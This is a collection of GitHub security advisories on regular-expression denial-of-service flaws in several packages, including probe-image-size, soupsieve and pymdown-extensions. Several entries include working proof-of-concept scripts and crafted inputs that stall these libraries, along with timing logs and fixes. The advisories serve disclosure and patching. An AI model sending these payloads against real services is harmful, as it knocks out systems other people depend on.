"nvd_published_at": "2026-08-25T01:16:37Z",
"severity": "HIGH"
},
"details": "SAP S/4HANA (Private Cloud) uses a third-party component that contains a Regular Expression Denial of Service (ReDoS) vulnerability. An unauthenticated attacker could supply specially crafted input that triggers excessive processing within the affected functionality. Successful exploitation could exhaust system resources and make the service unavailable, resulting in a high impact on availability. There is no impact on confidentiality and integrity.",
"id": "GHSA-g76p-cfx7-wh4j",
"modified": "2026-08-25T03:32:08Z",
"published": "2026-08-25T03:32:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-66766"
},
{
"type": "WEB",
"url": "https://me.sap.com/notes/3771065"
},
{
"type": "WEB",
"url": "https://url.sap/sapsecuritypatchday"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GCHV-QQ48-9RJW
Vulnerability from github – Published: 2026-07-22 15:31 – Updated: 2026-07-22 15:31Open Mercato does not validate regex rules. An attacker with privileges to create the regex rule can add an unsafe regex to a field. When someone provide the proper string it can result in a DoS attack.
This issue was fixed in version 0.6.4.
{
"affected": [],
"aliases": [
"CVE-2026-16270"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-22T13:16:36Z",
"severity": "MODERATE"
},
"details": "Open Mercato does not validate regex rules. An attacker with privileges to create the regex rule can add an unsafe regex to a field. When someone provide the proper string it can result in a DoS attack.\n\n\nThis issue was fixed in version 0.6.4.",
"id": "GHSA-gchv-qq48-9rjw",
"modified": "2026-07-22T15:31:20Z",
"published": "2026-07-22T15:31:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-16270"
},
{
"type": "WEB",
"url": "https://github.com/open-mercato/open-mercato/pull/1996"
},
{
"type": "WEB",
"url": "https://cert.pl/posts/2026/07/CVE-2026-16270"
},
{
"type": "WEB",
"url": "https://www.openmercato.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-GJJ5-9665-RWRC
Vulnerability from github – Published: 2026-10-02 23:18 – Updated: 2026-10-02 23:18Overview
probe-image-size scans the SVG header with a searching regular expression, /<[-_.:a-zA-Z0-9][^>]*>/. On input that contains many < characters but no >, the engine restarts the [^>]* scan at every < position and runs to end of input each time, giving quadratic time complexity.
Both the synchronous and the streaming parser are affected.
Impact
Every entry point that reaches the SVG parser is affected: probe.sync(), probe(stream) and probe(url). The URL form is the most exposed one — the input is fetched from a remote host, so an attacker only needs to supply a link.
Processing a crafted buffer blocks the Node.js event loop at 100% CPU for the whole duration. In production environments such as upload validators, image proxies or link unfurl services, a small number of concurrent requests is enough to deny service.
Root Cause Analysis
Two independent problems.
-
Absence of input size cap in the sync path.
lib/parse_sync/svg.jscopied the entire buffer into a string and matched against it. There was no size limit at all, so cost scaled with the size of the attacker-supplied buffer. -
Repeated rescanning in the stream path.
lib/parse_stream/svg.jsdid cap accumulated data at 64 KB, but calledparseSvg(str)on the whole accumulated string on every chunk, givingO(chunks × N²). The cap does not help here: the more chunks the input is split into, the more times the quadratic scan is repeated.
Chunk size is influenced by the sender. highWaterMark (16 KB) is a buffering threshold, not a lower bound — a socket read returns whatever has arrived. A server that writes one byte at a time produces one-byte chunks; this was confirmed against the real needle pipeline with default options.
The original report identified (1) only, and stated that the 64 KB cap mitigates the streaming path. It does not.
Proof of Concept (PoC)
Synchronous:
const probe = require('probe-image-size')
// ~200 KB of '<a' — contains '<' but never '>'
probe.sync(Buffer.from('<a'.repeat(100000), 'latin1'))
Streaming — the same payload split into chunks, slower per byte than the synchronous form:
const { Readable } = require('stream')
const probe = require('probe-image-size')
const payload = Buffer.from('<a'.repeat(32768), 'latin1')
const chunks = []
for (let i = 0; i < payload.length; i += 4096) chunks.push(payload.subarray(i, i + 4096))
await probe(Readable.from(chunks))
Measurements on the maintainer's machine:
| path | input | time |
|---|---|---|
probe.sync() |
25 KB | 0.9 s |
probe.sync() |
50 KB | 5.5 s |
probe.sync() |
100 KB | 18 s |
probe.sync() |
200 KB | 54 s |
probe(stream) |
64 KB, 1 chunk | 1.6 s |
probe(stream) |
64 KB, 4 chunks | 2.9 s |
probe(stream) |
64 KB, 16 chunks | 9.6 s |
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 7.3.0"
},
"package": {
"ecosystem": "npm",
"name": "probe-image-size"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-104861"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-10-02T23:18:02Z",
"nvd_published_at": "2026-10-02T18:17:02Z",
"severity": "HIGH"
},
"details": "## Overview\n\n`probe-image-size` scans the SVG header with a searching regular expression, `/\u003c[-_.:a-zA-Z0-9][^\u003e]*\u003e/`. On input that contains many `\u003c` characters but no `\u003e`, the engine restarts the `[^\u003e]*` scan at every `\u003c` position and runs to end of input each time, giving quadratic time complexity.\n\nBoth the synchronous and the streaming parser are affected.\n\n## Impact\n\nEvery entry point that reaches the SVG parser is affected: `probe.sync()`, `probe(stream)` and `probe(url)`. The URL form is the most exposed one \u2014 the input is fetched from a remote host, so an attacker only needs to supply a link.\n\nProcessing a crafted buffer blocks the Node.js event loop at 100% CPU for the whole duration. In production environments such as upload validators, image proxies or link unfurl services, a small number of concurrent requests is enough to deny service.\n\n## Root Cause Analysis\n\nTwo independent problems.\n\n1. **Absence of input size cap in the sync path.** `lib/parse_sync/svg.js` copied the entire buffer into a string and matched against it. There was no size limit at all, so cost scaled with the size of the attacker-supplied buffer.\n\n2. **Repeated rescanning in the stream path.** `lib/parse_stream/svg.js` did cap accumulated data at 64 KB, but called `parseSvg(str)` on the whole accumulated string on *every* chunk, giving `O(chunks \u00d7 N\u00b2)`. The cap does not help here: the more chunks the input is split into, the more times the quadratic scan is repeated.\n\n Chunk size is influenced by the sender. `highWaterMark` (16 KB) is a buffering threshold, not a lower bound \u2014 a socket read returns whatever has arrived. A server that writes one byte at a time produces one-byte chunks; this was confirmed against the real `needle` pipeline with default options.\n\nThe original report identified (1) only, and stated that the 64 KB cap mitigates the streaming path. It does not.\n\n## Proof of Concept (PoC)\n\nSynchronous:\n\n```js\nconst probe = require(\u0027probe-image-size\u0027)\n\n// ~200 KB of \u0027\u003ca\u0027 \u2014 contains \u0027\u003c\u0027 but never \u0027\u003e\u0027\nprobe.sync(Buffer.from(\u0027\u003ca\u0027.repeat(100000), \u0027latin1\u0027))\n```\n\nStreaming \u2014 the same payload split into chunks, slower per byte than the synchronous form:\n\n```js\nconst { Readable } = require(\u0027stream\u0027)\nconst probe = require(\u0027probe-image-size\u0027)\n\nconst payload = Buffer.from(\u0027\u003ca\u0027.repeat(32768), \u0027latin1\u0027)\nconst chunks = []\nfor (let i = 0; i \u003c payload.length; i += 4096) chunks.push(payload.subarray(i, i + 4096))\n\nawait probe(Readable.from(chunks))\n```\n\nMeasurements on the maintainer\u0027s machine:\n\n| path | input | time |\n| --- | --- | --- |\n| `probe.sync()` | 25 KB | 0.9 s |\n| `probe.sync()` | 50 KB | 5.5 s |\n| `probe.sync()` | 100 KB | 18 s |\n| `probe.sync()` | 200 KB | 54 s |\n| `probe(stream)` | 64 KB, 1 chunk | 1.6 s |\n| `probe(stream)` | 64 KB, 4 chunks | 2.9 s |\n| `probe(stream)` | 64 KB, 16 chunks | 9.6 s |",
"id": "GHSA-gjj5-9665-rwrc",
"modified": "2026-10-02T23:18:02Z",
"published": "2026-10-02T23:18:02Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodeca/probe-image-size/security/advisories/GHSA-gjj5-9665-rwrc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-104861"
},
{
"type": "WEB",
"url": "https://github.com/nodeca/probe-image-size/commit/60cc96ac0b671e79e328213d0a8e831312b09e84"
},
{
"type": "WEB",
"url": "https://github.com/nodeca/probe-image-size/commit/9b74656d6f973cc59ea2ab1375c0d88390a402ad"
},
{
"type": "WEB",
"url": "https://github.com/nodeca/probe-image-size/commit/c032aefabdecf5cb50548ab9ba175db56353078f"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodeca/probe-image-size"
},
{
"type": "WEB",
"url": "https://github.com/nodeca/probe-image-size/releases/tag/7.4.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "probe-image-size: Quadratic-time Denial of Service in the SVG Parser"
}
GHSA-GJV8-XP57-G29C
Vulnerability from github – Published: 2026-09-17 20:32 – Updated: 2026-09-17 20:32Summary
soupsieve compiles CSS selector strings with a set of hand-written regular expressions. The shared IDENTIFIER sub-pattern (also embedded in VALUE, and therefore in attribute selectors) places two adjacent quantified groups over overlapping character classes: (?:[classA]|ESC)+(?:[classB]|ESC)*, where both classes match ordinary identifier characters such as a. When a selector contains a long identifier/value run that must ultimately fail to match (e.g. an attribute value with no closing ], or an identifier followed by an invalid character), the regex engine backtracks across all O(n) ways to split the run between the + group and the * group, giving O(n²) parse time. A single attacker-controlled selector of a few kilobytes stalls the interpreter for many seconds of CPU; tens of kilobytes reach minutes.
Trust model (Q0)
The selector string is the input. It reaches this code via soupsieve.compile(), soupsieve.select/iselect/match/filter, and — most commonly — BeautifulSoup's soup.select(selector) / soup.select_one(selector), which delegate to soupsieve. This is exploitable in any application that passes a user-controlled CSS selector to BeautifulSoup/soupsieve (scrapers that accept selectors, no-code extraction tools, admin/query UIs). Applications that only use hard-coded selectors are not affected.
Root cause (exact anchors) — src/soupsieve/css_parser.py
# lines 122-126
IDENTIFIER = fr'''
(?:(?:-?(?:[^\x00-\x2f\x30-\x40\x5B-\x5E\x60\x7B-\x9f]|{CSS_ESCAPES})+|--)
(?:[^\x00-\x2c\x2e\x2f\x3A-\x40\x5B-\x5E\x60\x7B-\x9f]|{CSS_ESCAPES})*)
'''
# line 129 — VALUE embeds IDENTIFIER (so attribute values inherit the pattern)
VALUE = fr'''(?:"(?:\\(?:.|{NEWLINE})|[^\\"\r\n\f])*?"|'...'|{IDENTIFIER})'''
- classA
[^\x00-\x2f\x30-\x40\x5B-\x5E\x60\x7B-\x9f]excludes digits (0x30-0x39); classB[^\x00-\x2c\x2e\x2f\x3A-\x40\x5B-\x5E\x60\x7B-\x9f]allows digits. The intent is "first char not a digit, remaining chars may be digits." - Both classes match ordinary letters (e.g.
a= 0x61). The construct is therefore effectively(?:C)+(?:C)*over an overlapping class C — the canonical adjacent-quantifier shape that backtracks quadratically on a failing match.
The quadratic only manifests when the overall match must fail. IDENTIFIER matched greedily on "a"*n succeeds in linear time (~1 ms at n=32000). Anchoring it so a following element is mandatory and fails (IDENTIFIER + "$" against "a"*n + "!") reproduces the O(n²) directly: n=2000 → 44 ms, 4000 → 257 ms, 8000 → 743 ms, 16000 → 2944 ms (~×4 per ×2). Profiling compile("[a=" + "a"*4000) shows only 12 re.match calls consuming 2.685 s — i.e. the cost is inside a single regex match, confirming regex backtracking (not loop overhead).
Reproduction environment (discipline #12 — published artifact)
- git HEAD
751c57b(2.9,PYTHONPATH=src):cd src && python3 ../poc/poc_redos_compile.py. - Published PyPI
soupsieve 2.8.4(freshuv pip install soupsieve beautifulsoup4):cd poc && ../.venv-published/bin/python poc_redos_compile.py→ same O(n²) (evidence:poc/evidence_redos_compile_PUBLISHED_2.8.4.log). - Python 3.11.15 and 3.14.6 both reproduce.
PoC (poc/poc_redos_compile.py)
import sys, time
sys.path.insert(0, ".")
import soupsieve as sv
def compile_time(sel):
t0 = time.perf_counter()
try:
sv.compile(sel)
status = "ok"
except Exception as e:
status = type(e).__name__
return (time.perf_counter() - t0), status
print(f"soupsieve {sv.__version__}\n")
print("Payload A: '[a=' + 'a'*n (unterminated attribute value)")
for n in (1000, 2000, 4000, 8000):
dt, st = compile_time("[a=" + "a" * n)
print(f" n={n:<6} len={3+n:<7} {dt*1000:9.1f} ms [{st}]")
print("\nPayload B: 'a'*n + '!' (identifier run + invalid trailing char)")
for n in (2000, 4000, 8000, 16000):
dt, st = compile_time("a" * n + "!")
print(f" n={n:<6} len={n+1:<7} {dt*1000:9.1f} ms [{st}]")
payload = "[a=" + "a" * 12000
dt, st = compile_time(payload)
print(f"\n[+] Single call: compile('[a=' + 'a'*12000) (len={len(payload)})")
print(f"[+] wall time = {dt:.2f} s [{st}]")
End-to-end note: bs4.BeautifulSoup(html).select(payload) reaches the same compile() path, so the stall is triggerable directly through BeautifulSoup with a user-supplied selector. Verified on bs4 4.15.0 + soupsieve 2.8.4: soup.select("[a=" + "a"*6000) took ~5.0 s for one call (evidence: poc/evidence_bs4_select_PUBLISHED_2.8.4.log).
Evidence — HEAD 2.9 (verbatim poc/evidence_redos_compile.log)
soupsieve 2.9
Payload A: '[a=' + 'a'*n (unterminated attribute value)
n=1000 len=1003 214.8 ms [SelectorSyntaxError]
n=2000 len=2003 504.7 ms [SelectorSyntaxError]
n=4000 len=4003 2031.9 ms [SelectorSyntaxError]
n=8000 len=8003 8091.3 ms [SelectorSyntaxError]
Payload B: 'a'*n + '!' (identifier run + invalid trailing char)
n=2000 len=2001 79.7 ms [SelectorSyntaxError]
n=4000 len=4001 322.9 ms [SelectorSyntaxError]
n=8000 len=8001 1328.9 ms [SelectorSyntaxError]
n=16000 len=16001 5379.4 ms [SelectorSyntaxError]
[+] Single call: compile('[a=' + 'a'*12000) (len=12003)
[+] wall time = 18.28 s [SelectorSyntaxError]
Evidence — published 2.8.4 (verbatim poc/evidence_redos_compile_PUBLISHED_2.8.4.log)
soupsieve 2.8.4
Payload A: '[a=' + 'a'*n
n=1000 len=1003 113.9 ms [SelectorSyntaxError]
n=2000 len=2003 457.2 ms [SelectorSyntaxError]
n=4000 len=4003 1816.8 ms [SelectorSyntaxError]
n=8000 len=8003 7299.0 ms [SelectorSyntaxError]
[+] Single call: compile('[a=' + 'a'*12000) wall time = 16.57 s [SelectorSyntaxError]
Impact — calibrated
- Confirmed: quadratic CPU consumption per
compile()/select()call on an attacker-controlled selector. ~8 KB → ~8 s; ~12 KB → ~17 s; scaling ~×4 per input doubling. A handful of such requests exhausts a worker/thread and degrades or stalls the service (single-threaded regex holds the GIL). - Realistic exposure: services that accept user-supplied CSS selectors and feed them to BeautifulSoup/soupsieve.
- NOT claimed: exponential blowup, memory corruption, or code execution. This is strictly an availability (DoS) issue, and only where selectors are attacker-influenced. Applications using only fixed selectors are unaffected — stated to avoid inflation.
Remediation
- Remove the adjacent-quantifier ambiguity in
IDENTIFIER: match a single leading non-digit character then the remaining class once, e.g.(?:-?(?:[classA]|ESC)(?:[classB]|ESC)*|--(?:[classB]|ESC)*), so no+/*pair spans the same characters. - Alternatively use atomic grouping / possessive quantifiers where supported (
(?>...),*+) to forbid backtracking into the identifier run. - Defense-in-depth: cap selector length before compiling (reject selectors beyond a sane bound), since CSS selectors are realistically short.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "soupsieve"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-86000"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-17T20:32:58Z",
"nvd_published_at": "2026-09-17T16:18:16Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nsoupsieve compiles CSS selector strings with a set of hand-written regular expressions. The shared `IDENTIFIER` sub-pattern (also embedded in `VALUE`, and therefore in attribute selectors) places two adjacent quantified groups over overlapping character classes: `(?:[classA]|ESC)+(?:[classB]|ESC)*`, where both classes match ordinary identifier characters such as `a`. When a selector contains a long identifier/value run that must ultimately fail to match (e.g. an attribute value with no closing `]`, or an identifier followed by an invalid character), the regex engine backtracks across all O(n) ways to split the run between the `+` group and the `*` group, giving O(n\u00b2) parse time. A single attacker-controlled selector of a few kilobytes stalls the interpreter for many seconds of CPU; tens of kilobytes reach minutes.\n\n## Trust model (Q0)\n\nThe selector string is the input. It reaches this code via `soupsieve.compile()`, `soupsieve.select/iselect/match/filter`, and \u2014 most commonly \u2014 BeautifulSoup\u0027s `soup.select(selector)` / `soup.select_one(selector)`, which delegate to soupsieve. This is exploitable in any application that passes a user-controlled CSS selector to BeautifulSoup/soupsieve (scrapers that accept selectors, no-code extraction tools, admin/query UIs). Applications that only use hard-coded selectors are not affected.\n\n## Root cause (exact anchors) \u2014 `src/soupsieve/css_parser.py`\n\n```python\n# lines 122-126\nIDENTIFIER = fr\u0027\u0027\u0027\n(?:(?:-?(?:[^\\x00-\\x2f\\x30-\\x40\\x5B-\\x5E\\x60\\x7B-\\x9f]|{CSS_ESCAPES})+|--)\n(?:[^\\x00-\\x2c\\x2e\\x2f\\x3A-\\x40\\x5B-\\x5E\\x60\\x7B-\\x9f]|{CSS_ESCAPES})*)\n\u0027\u0027\u0027\n# line 129 \u2014 VALUE embeds IDENTIFIER (so attribute values inherit the pattern)\nVALUE = fr\u0027\u0027\u0027(?:\"(?:\\\\(?:.|{NEWLINE})|[^\\\\\"\\r\\n\\f])*?\"|\u0027...\u0027|{IDENTIFIER})\u0027\u0027\u0027\n```\n\n- classA `[^\\x00-\\x2f\\x30-\\x40\\x5B-\\x5E\\x60\\x7B-\\x9f]` excludes digits (0x30-0x39); classB `[^\\x00-\\x2c\\x2e\\x2f\\x3A-\\x40\\x5B-\\x5E\\x60\\x7B-\\x9f]` allows digits. The intent is \"first char not a digit, remaining chars may be digits.\"\n- Both classes match ordinary letters (e.g. `a` = 0x61). The construct is therefore effectively `(?:C)+(?:C)*` over an overlapping class C \u2014 the canonical adjacent-quantifier shape that backtracks quadratically on a failing match.\n\nThe quadratic only manifests when the overall match must fail. `IDENTIFIER` matched greedily on `\"a\"*n` succeeds in linear time (~1 ms at n=32000). Anchoring it so a following element is mandatory and fails (`IDENTIFIER + \"$\"` against `\"a\"*n + \"!\"`) reproduces the O(n\u00b2) directly: n=2000 \u2192 44 ms, 4000 \u2192 257 ms, 8000 \u2192 743 ms, 16000 \u2192 2944 ms (~\u00d74 per \u00d72). Profiling `compile(\"[a=\" + \"a\"*4000)` shows only 12 `re.match` calls consuming 2.685 s \u2014 i.e. the cost is inside a single regex match, confirming regex backtracking (not loop overhead).\n\n## Reproduction environment (discipline #12 \u2014 published artifact)\n\n- git HEAD `751c57b` (2.9, `PYTHONPATH=src`): `cd src \u0026\u0026 python3 ../poc/poc_redos_compile.py`.\n- Published PyPI `soupsieve 2.8.4` (fresh `uv pip install soupsieve beautifulsoup4`): `cd poc \u0026\u0026 ../.venv-published/bin/python poc_redos_compile.py` \u2192 same O(n\u00b2) (evidence: `poc/evidence_redos_compile_PUBLISHED_2.8.4.log`).\n- Python 3.11.15 and 3.14.6 both reproduce.\n\n## PoC (`poc/poc_redos_compile.py`)\n\n```python\nimport sys, time\nsys.path.insert(0, \".\")\nimport soupsieve as sv\n\ndef compile_time(sel):\n t0 = time.perf_counter()\n try:\n sv.compile(sel)\n status = \"ok\"\n except Exception as e:\n status = type(e).__name__\n return (time.perf_counter() - t0), status\n\nprint(f\"soupsieve {sv.__version__}\\n\")\n\nprint(\"Payload A: \u0027[a=\u0027 + \u0027a\u0027*n (unterminated attribute value)\")\nfor n in (1000, 2000, 4000, 8000):\n dt, st = compile_time(\"[a=\" + \"a\" * n)\n print(f\" n={n:\u003c6} len={3+n:\u003c7} {dt*1000:9.1f} ms [{st}]\")\n\nprint(\"\\nPayload B: \u0027a\u0027*n + \u0027!\u0027 (identifier run + invalid trailing char)\")\nfor n in (2000, 4000, 8000, 16000):\n dt, st = compile_time(\"a\" * n + \"!\")\n print(f\" n={n:\u003c6} len={n+1:\u003c7} {dt*1000:9.1f} ms [{st}]\")\n\npayload = \"[a=\" + \"a\" * 12000\ndt, st = compile_time(payload)\nprint(f\"\\n[+] Single call: compile(\u0027[a=\u0027 + \u0027a\u0027*12000) (len={len(payload)})\")\nprint(f\"[+] wall time = {dt:.2f} s [{st}]\")\n```\n\nEnd-to-end note: `bs4.BeautifulSoup(html).select(payload)` reaches the same `compile()` path, so the stall is triggerable directly through BeautifulSoup with a user-supplied selector. Verified on bs4 4.15.0 + soupsieve 2.8.4: `soup.select(\"[a=\" + \"a\"*6000)` took ~5.0 s for one call (evidence: `poc/evidence_bs4_select_PUBLISHED_2.8.4.log`).\n\n## Evidence \u2014 HEAD 2.9 (verbatim `poc/evidence_redos_compile.log`)\n\n```\nsoupsieve 2.9\n\nPayload A: \u0027[a=\u0027 + \u0027a\u0027*n (unterminated attribute value)\n n=1000 len=1003 214.8 ms [SelectorSyntaxError]\n n=2000 len=2003 504.7 ms [SelectorSyntaxError]\n n=4000 len=4003 2031.9 ms [SelectorSyntaxError]\n n=8000 len=8003 8091.3 ms [SelectorSyntaxError]\n\nPayload B: \u0027a\u0027*n + \u0027!\u0027 (identifier run + invalid trailing char)\n n=2000 len=2001 79.7 ms [SelectorSyntaxError]\n n=4000 len=4001 322.9 ms [SelectorSyntaxError]\n n=8000 len=8001 1328.9 ms [SelectorSyntaxError]\n n=16000 len=16001 5379.4 ms [SelectorSyntaxError]\n\n[+] Single call: compile(\u0027[a=\u0027 + \u0027a\u0027*12000) (len=12003)\n[+] wall time = 18.28 s [SelectorSyntaxError]\n```\n\n## Evidence \u2014 published 2.8.4 (verbatim `poc/evidence_redos_compile_PUBLISHED_2.8.4.log`)\n\n```\nsoupsieve 2.8.4\nPayload A: \u0027[a=\u0027 + \u0027a\u0027*n\n n=1000 len=1003 113.9 ms [SelectorSyntaxError]\n n=2000 len=2003 457.2 ms [SelectorSyntaxError]\n n=4000 len=4003 1816.8 ms [SelectorSyntaxError]\n n=8000 len=8003 7299.0 ms [SelectorSyntaxError]\n[+] Single call: compile(\u0027[a=\u0027 + \u0027a\u0027*12000) wall time = 16.57 s [SelectorSyntaxError]\n```\n\n## Impact \u2014 calibrated\n\n- Confirmed: quadratic CPU consumption per `compile()`/`select()` call on an attacker-controlled selector. ~8 KB \u2192 ~8 s; ~12 KB \u2192 ~17 s; scaling ~\u00d74 per input doubling. A handful of such requests exhausts a worker/thread and degrades or stalls the service (single-threaded regex holds the GIL).\n- Realistic exposure: services that accept user-supplied CSS selectors and feed them to BeautifulSoup/soupsieve.\n- NOT claimed: exponential blowup, memory corruption, or code execution. This is strictly an availability (DoS) issue, and only where selectors are attacker-influenced. Applications using only fixed selectors are unaffected \u2014 stated to avoid inflation.\n\n## Remediation\n\n- Remove the adjacent-quantifier ambiguity in `IDENTIFIER`: match a single leading non-digit character then the remaining class once, e.g. `(?:-?(?:[classA]|ESC)(?:[classB]|ESC)*|--(?:[classB]|ESC)*)`, so no `+`/`*` pair spans the same characters.\n- Alternatively use atomic grouping / possessive quantifiers where supported (`(?\u003e...)`, `*+`) to forbid backtracking into the identifier run.\n- Defense-in-depth: cap selector length before compiling (reject selectors beyond a sane bound), since CSS selectors are realistically short.",
"id": "GHSA-gjv8-xp57-g29c",
"modified": "2026-09-17T20:32:58Z",
"published": "2026-09-17T20:32:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/facelessuser/soupsieve/security/advisories/GHSA-gjv8-xp57-g29c"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-86000"
},
{
"type": "WEB",
"url": "https://github.com/facelessuser/soupsieve/commit/ce44e4996e6632871c18cdd7a7fb641be8ef34ef"
},
{
"type": "PACKAGE",
"url": "https://github.com/facelessuser/soupsieve"
},
{
"type": "WEB",
"url": "https://github.com/facelessuser/soupsieve/releases/tag/2.9"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Soup Sieve: Polynomial-time ReDoS (O(n\u00b2)) in the `IDENTIFIER` / `VALUE` selector sub-patterns"
}
GHSA-GM37-52C6-37MW
Vulnerability from github – Published: 2026-08-07 18:26 – Updated: 2026-08-07 18:26Summary
Four inline processors in pymdown-extensions contain regular expressions with
exponential backtracking. A single untrusted Markdown line under
50 bytes drives markdown.markdown() into unbounded CPU on the rendering thread
(seconds at ~45 bytes, growing exponentially with each added character). All four
fire in the extension's default configuration
and are reachable through the documented public API. The caret/tilde/
betterem blow-up was introduced by the emphasis-pattern rewrite in PR #2547
(first released in 10.13, Dec 2024) — earlier releases used a linear
(.+?) / ([^\s]+?) content group — and is present through 11.0 (latest);
magiclink's host pattern is long-standing and affects effectively all releases.
Likely CWE-1333 (Inefficient Regular Expression Complexity).
This is a distinct issue from CVE-2025-68142 (ReDoS in pymdownx.blocks.caption,
RE_FIG_NUM, fixed in 10.16.1): different extensions, different regexes, and a
different root cause (delimiter-run partition ambiguity rather than a ./\.
typo).
Details
Four regexes share, or closely mirror, a vulnerable shape — an inner group that
can partition a run of the delimiter character into {2,}-sized pieces in
exponentially many ways, wrapped in a lazy +? that must fail before the engine
can give up:
| Extension | Regex | Location (11.0) |
|---|---|---|
pymdownx.caret (superscript ^…^) |
SUP2 |
pymdownx/caret.py:56 |
pymdownx.tilde (subscript ~…~) |
SUB2 |
pymdownx/tilde.py:55 |
pymdownx.betterem (underscore _…_) |
SMART_UNDER_EM2 (default) |
pymdownx/betterem.py:93 |
pymdownx.magiclink (bare-URL autolink) |
RE_LINK |
pymdownx/magiclink.py:56 (host at :59) |
pymdownx/caret.py:56 (pymdown-extensions 11.0):
SUP2 = r'(?<!\^)(\^)(?![\^\s])((?:[^\^\s]|\^{2,})+?)(?<![\^\s])(\^)(?!\^)'
The content group (?:[^\^\s]|\^{2,})+? matches a run of carets only via the
\^{2,} branch. A run of k carets can be split into ≥2-length pieces in
exponentially many combinations; when no caret can serve as a valid closing
delimiter (the trailing (?<![\^\s])(\^) cannot be satisfied), the engine
explores every partition before failing. SUB2 (tilde) and SMART_UNDER_EM2
(betterem) are the same construct for ~ and _. In betterem the default
smart_enable='underscore' routes underscores to SmartUnderscoreProcessor →
SMART_UNDER_EM2 (betterem.py:93), which is the default-reachable,
API-exploitable pattern; the non-smart UNDER_EM2 (:69, used only when
smart_enable is asterisk/disable) shares the shape but did not reproduce
through the public markdown.markdown() pipeline on the tested payload, so a fix
and regression test should target SMART_UNDER_EM2.
pymdownx/magiclink.py:59 has the analogous ambiguity in the host portion, where
overlapping character classes let a run of dots be grouped exponentially:
(?:ht|f)tps?://[^_\W][-\w]*(?:\.[-\w.]+)* # host: '\.' and '[-\w.]' inside (?:...)* both match '.'
SUP2/SUB2/SMART_UNDER_EM2 are applied at each delimiter occurrence via the
default PatternSequenceProcessor subclasses (pymdownx/util.py); RE_LINK is
applied by MagiclinkPattern (registered unconditionally at priority 85). In all
four cases, rendering markdown.markdown(src, extensions=[ext]) on untrusted
src in default configuration is sufficient to reach the regex.
PoC
Single self-contained script; runs against the pinned release in an ephemeral env. Non-destructive — the input is ordinary Markdown text; the impact is CPU/time (a per-render alarm caps each attempt so the script terminates).
import signal
import time
from importlib.metadata import version
import markdown
print(f"# pymdown-extensions {version('pymdown-extensions')} / markdown {version('markdown')}")
CAP = 5.0 # a single render exceeding this is treated as a hang
class Timeout(Exception):
pass
def render(ext, text):
signal.signal(signal.SIGALRM, lambda *_: (_ for _ in ()).throw(Timeout()))
signal.setitimer(signal.ITIMER_REAL, CAP)
t = time.perf_counter()
try:
markdown.markdown(text, extensions=[ext])
return time.perf_counter() - t
except Timeout:
return None
finally:
signal.setitimer(signal.ITIMER_REAL, 0)
# ext -> (malicious builder, benign builder [valid & closed], ramp, hang count)
CASES = {
"pymdownx.caret": (lambda n: "^a" + "^" * n + "b", lambda n: "^" + "a" * n + "^", [24, 30, 36], 44),
"pymdownx.tilde": (lambda n: "~a" + "~" * n + "b", lambda n: "~" + "a" * n + "~", [24, 30, 36], 44),
"pymdownx.betterem": (lambda n: "_a" + "_" * n + "b", lambda n: "_" + "a" * n + "_", [24, 30, 36], 44),
"pymdownx.magiclink": (lambda n: "http://a" + "." * n + " ", lambda n: "http://" + "a" * n + ".com ", [28, 32, 36], 40),
}
repro = []
for ext, (evil, benign, ramp, hang) in CASES.items():
base_txt = benign(hang) # valid, closed run: same regex machinery, but linear
base = render(ext, base_txt)
print(f"\n[{ext}] benign baseline (len {len(base_txt)}, valid+closed): {base * 1e3:.3f} ms")
prev = None
for n in ramp:
txt = evil(n)
dt = render(ext, txt)
ratio = f" (x{dt / prev:.1f})" if (prev and dt) else ""
shown = f"{dt:8.3f} s" if dt is not None else f"> {CAP:.0f} s (HANG)"
print(f" malicious len {len(txt):3d}: {shown}{ratio}")
prev = dt
txt = evil(hang)
dt = render(ext, txt)
hung = dt is None
print(f" malicious len {len(txt):3d}: "
f"{'> %.0f s (HANG)' % CAP if hung else '%.3f s' % dt}")
ok = base < 0.05 and (hung or dt > 1.0)
repro.append(ok)
print(f" => {'REPRODUCED' if ok else 'not reproduced'}: a {len(txt)}-byte "
